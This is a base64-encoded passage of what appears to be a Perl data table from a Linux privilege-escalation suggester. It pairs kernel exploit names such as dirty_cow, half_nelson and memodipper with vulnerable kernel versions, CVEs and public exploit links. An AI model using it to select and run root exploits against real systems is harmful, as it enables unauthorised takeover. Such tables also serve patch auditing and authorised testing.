ywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvODQ3OCcsCiAgICB9LAoKICAgICdzb2NrX3NlbmRwYWdlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjAnLCAgJzIuNi4xJywKICAgICAgICAgICAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywgICcyLjYuNicsICAnMi42LjcnLAogICAgICAgICAgICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsICcyLjYuMTMnLAogICAgICAgICAgICAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywgJzIuNi4xOCcsICcyLjYuMTknLAogICAgICAgICAgICAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLAogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ3Byb3RvX29wcycsCiAgICAgICAgY3ZlID0+ICcyMDA5LTI2OTInLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy85NDM2JywKICAgIH0sCgogICAgJ3NvY2tfc2VuZHBhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNC40JywgICcyLjQuNScsICAnMi40LjYnLCAgJzIuNC43JywgICcyLjQuOCcsICAnMi40LjknLAogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xMScsICcyLjQuMTInLCAnMi40LjEzJywgJzIuNC4xNCcsICcyLjQuMTUnLAogICAgICAgICAgICAnMi40LjE2JywgJzIuNC4xNycsICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLAogICAgICAgICAgICAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnLCAnMi40LjI1JywgJzIuNC4yNicsICcyLjQuMjcnLAogICAgICAgICAgICAnMi40LjI4JywgJzIuNC4yOScsICcyLjQuMzAnLCAnMi40LjMxJywgJzIuNC4zMicsICcyLjQuMzMnLAogICAgICAgICAgICAnMi40LjM0JywgJzIuNC4zNScsICcyLjQuMzYnLCAnMi40LjM3JywgJzIuNi4wJywgICcyLjYuMScsCiAgICAgICAgICAgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsICAnMi42LjYnLCAgJzIuNi43JywKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywKICAgICAgICAgICAgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywKICAgICAgICAgICAgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI1JywKICAgICAgICAgICAgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICd3dW5kZXJiYXJfZW1wb3JpdW0nLAogICAgICAgIGN2ZSA9PiAnMjAwOS0yNjkyJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvOTQzNScsCiAgICB9LAogICAgJ3VkcF9zZW5kbXNnXzMyYml0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLCAgJzIuNi42JywKICAgICAgICAgICAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLCAnMi42LjEyJywKICAgICAgICAgICAgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLCAnMi42LjE4JywKICAgICAgICAgICAgJzIuNi4xOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMjY5OCcsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL2Rvd25sb2Fkcy5zZWN1cml0eWZvY3VzLmNvbS92dWxuZXJhYmlsaXRpZXMvZXhwbG9pdHMvMzYxMDguYycsCiAgICB9LAogICAgJ3BpcGUuY18zMmJpdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjE1JywgJzIuNi4xNicsCiAgICAgICAgICAgICcyLjYuMTcnLCAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsCiAgICAgICAgICAgICcyLjYuMjMnLCAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMzU0NycsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9kYXRhL3Z1bG5lcmFiaWxpdGllcy9leHBsb2l0cy8zNjkwMS0xLmMnLAogICAgfSwKICAgICdkb19wYWdlc19tb3ZlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnc2lldmUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0wNDE1JywKICAgICAgICBtaWwgPT4gJ1NwZW5kZXJzIEVubGlnaHRlbm1lbnQnLAogICAgfSwKICAgICdyZWlzZXJmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMTE0NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEyMTMwJywKICAgIH0sCiAgICAnY2FuX2JjbScgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC0yOTU5JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTQ4MTQnLAogICAgfSwKICAgICdyZHMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgICAgICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTUyODUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zOTA0JywKICAgIH0sCiAgICAnaGFsZl9uZWxzb24xJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywKICAgICAgICAgICAgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ2Vjb25ldCcsCiAgICAgICAgY3ZlID0+ICcyMDEwLTM4NDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNzc4NycsCiAgICB9LAogICAgJ2hhbGZfbmVsc29uMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdlY29uZXQnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zODUwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTc3ODcnLAogICAgfSwKICAgICdoYWxmX25lbHNvbjMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnZWNvbmV0JywKICAgICAgICBjdmUgPT4gJzIwMTAtNDA3MycsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE3Nzg3JywKICAgIH0sCiAgICAnY2Fwc190b19yb290JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicgXSwKICAgICAgICBjdmUgID0+ICduL2EnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTkxNicsCiAgICB9LAogICAgJ2FtZXJpY2FuLXNpZ24tbGFuZ3VhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC00MzQ3JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYmlkLzQ1NDA4JywKICAgIH0sCiAgICAncGt0Y2R2ZCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEwLTM0MzcnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTE1MCcsCiAgICB9LAogICAgJ3ZpZGVvNGxpbnV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMzA4MScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE1MDI0JywKICAgIH0sCiAgICAnbWVtb2RpcHBlcicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjM5JywgJzMuMC4wJywgJzMuMC4xJywgJzMuMC4yJywgJzMuMC4zJywgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTItMDA1NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE4NDExJywKICAgIH0sCiAgICAnc2VtdGV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMzcnLCAnMi42LjM4JywgJzIuNi4zOScsICczLjAuMCcsICczLjAuMScsICczLjAuMicsCiAgICAgICAgICAgICczLjAuMycsICAnMy4wLjQnLCAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI1NDQ0JywKICAgIH0sCiAgICAncGVyZl9zd2V2ZW50JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICczLjAuMCcsICczLjAuMScsICczLjAuMicsICczLjAuMycsICczLjAuNCcsICczLjAuNScsCiAgICAgICAgICAgICczLjAuNicsICczLjEuMCcsICczLjIuMCcsICczLjMuMCcsICczLjQuMCcsICczLjQuMScsCiAgICAgICAgICAgICczLjQuMicsICczLjQuMycsICczLjQuNCcsICczLjQuNScsICczLjQuNicsICczLjQuOCcsCiAgICAgICAgICAgICczLjQuOScsICczLjUuMCcsICczLjYuMCcsICczLjcuMCcsICczLjguMCcsICczLjguMScsCiAgICAgICAgICAgICczLjguMicsICczLjguMycsICczLjguNCcsICczLjguNScsICczLjguNicsICczLjguNycsCiAgICAgICAgICAgICczLjguOCcsICczLjguOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI2MTMxJywKICAgIH0sCiAgICAnbXNyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgICAgICcyLjYuMzUnLCAnMi42LjM2JywgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMC4wJywKICAgICAgICAgICAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgICczLjAuNScsICAnMy4wLjYnLAogICAgICAgICAgICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLCAgJzMuNS4wJywgICczLjYuMCcsCiAgICAgICAgICAgICczLjcuMCcsICAnMy43LjYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEzLTAyNjgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yNzI5NycsCiAgICB9LAogICAgJ3RpbWVvdXRwd24nID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuNC4wJywgICczLjUuMCcsICAnMy42LjAnLCAgJzMuNy4wJywgICczLjguMCcsICAnMy44LjknLCAKICAgICAgICAgICAgJzMuOS4wJywgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC41JywgICczLjguNicsICAKICAgICAgICAgICAgJzMuOC45JywgICczLjkuMCcsICAnMy45LjYnLCAgJzMuMTAuMCcsICczLjEwLjYnLCAnMy4xMS4wJywKICAgICAgICAgICAgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xMy4xJwogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDE0LTAwMzgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8zMTM0NicsCiAgICB9LAogICAgJ3Jhd21vZGVQVFknID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLCAnMi42LjM2JywKICAgICAgICAgICAgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMTQuMCcsICczLjE1LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTQtMDE5NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vcGFja2V0c3Rvcm1zZWN1cml0eS5jb20vZmlsZXMvZG93bmxvYWQvMTI2NjAzL2N2ZS0yMDE0LTAxOTYtbWQuYycsCiAgICB9LAogICAgJ292ZXJsYXlmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMy4xMy4wJywgJzMuMTYuMCcsICczLjE5LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTUtODY2MCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5MjMwJywKICAgIH0sCiAgICAncHBfa2V5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCgkJCSczLjQuMCcsICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC4xJywgIAogICAgICAgICAgICAnMy44LjInLCAgJzMuOC4zJywgICczLjguNCcsICAnMy44LjUnLCAgJzMuOC42JywgICczLjguNycsICAKICAgICAgICAgICAgJzMuOC44JywgICczLjguOScsICAnMy45LjAnLCAgJzMuOS42JywgICczLjEwLjAnLCAnMy4xMC42JywgCiAgICAgICAgICAgICczLjExLjAnLCAnMy4xMi4wJywgJzMuMTMuMCcsICczLjEzLjEnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtMDcyOCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5Mjc3JywKICAgIH0sCiAgICAnZGlydHlfY293JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsIAoJCQknMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAKICAgICAgICAgICAgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsICcyLjYuMzcnLCAnMi42LjM4JywgCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgIAogICAgICAgICAgICAnMy4wLjUnLCAgJzMuMC42JywgICczLjEuMCcsICAnMy4yLjAnLCAgJzMuMy4wJywgICczLjQuMCcsICAKICAgICAgICAgICAgJzMuNS4wJywgICczLjYuMCcsICAnMy43LjAnLCAgJzMuNy42JywgICczLjguMCcsICAnMy45LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtNTE5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQwNjE2JywKICAgIH0sCiAgICAnYWZfcGFja2V0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzQuNC4wJyBdLAogICAgICAgIGN2ZSA9PiAnMjAxNi04NjU1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDA4NzEnLAogICAgfSwKICAgICdwYWNrZXRfc2V0X3JpbmcnID0+IHsKICAgICAgICB2dWxuID0+IFsnNC44LjAnIF0sCiAgICAgICAgY3ZlID0+ICcyMDE3LTczMDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80MTk5NCcsCiAgICB9LAogICAgJ2Nsb25lX25ld3VzZXInID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuMy41JywgJzMuMy40JywgJzMuMy4yJywgJzMuMi4xMycsICczLjIuOScsICczLjIuMScsIAogICAgICAgICAgICAnMy4xLjgnLCAnMy4wLjUnLCAnMy4wLjQnLCAnMy4wLjInLCAnMy4wLjEnLCAnMy4yJywgJzMuMC4xJywgJzMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnTlxBJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMzgzOTAnLAogICAgfSwKICAgICdnZXRfcmVrdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnNC40LjAnLCAnNC44LjAnLCAnNC4xMC4wJywgJzQuMTMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxNy0xNjY5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQ1MDEwJywKICAgIH0sCiAgICAnZXhwbG9pdF94JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsCiAgICAgICAgICAgICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuM